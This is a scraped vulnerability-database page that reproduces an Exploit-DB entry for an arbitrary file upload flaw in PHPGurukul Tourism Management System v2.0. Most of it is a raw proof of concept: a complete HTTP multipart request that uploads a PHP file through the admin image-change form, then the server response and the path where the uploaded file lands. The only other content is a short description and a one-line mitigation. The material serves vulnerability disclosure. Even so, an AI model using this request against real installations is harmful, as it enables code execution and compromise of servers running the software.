Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Tourism Management System v2.0 - Arbitrary File Upload - exploit.company
header-logo
Suggest Exploit
vendor:
Tourism Management System
by:
SoSPiro
6.1
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Tourism Management System
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:tourism_management_system:2.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro
2024

Tourism Management System v2.0 – Arbitrary File Upload

Tourism Management System v2.0 is vulnerable to arbitrary file upload due to insufficient input sanitization. An attacker can exploit this vulnerability to upload malicious files to the server.

Mitigation:

To mitigate this vulnerability, ensure that user inputs are properly validated and sanitized to prevent unauthorized file uploads.
Source

Exploit-DB raw data:

# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload
# Google Dork: N/A
# Exploit Author: SoSPiro
# Date: 2024-02-18
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/tourism-management-system-free-download/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Allows admin to upload all files to the web server
# CVE : N/A


# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.

# PoC request


POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201
Content-Length: 361
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red

-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"
Content-Type: text/plain

<?php phpinfo();?>
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="submit"


-----------------------------390927495111779706051786831201--




===========================================================================================

- Response -

HTTP/1.1 200 OK
Date: Sun, 18 Feb 2024 04:33:37 GMT
Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/8.1.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8146

============================================================================================

- File location -

http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php

Navigation

Suggest Exploit

Services By CQR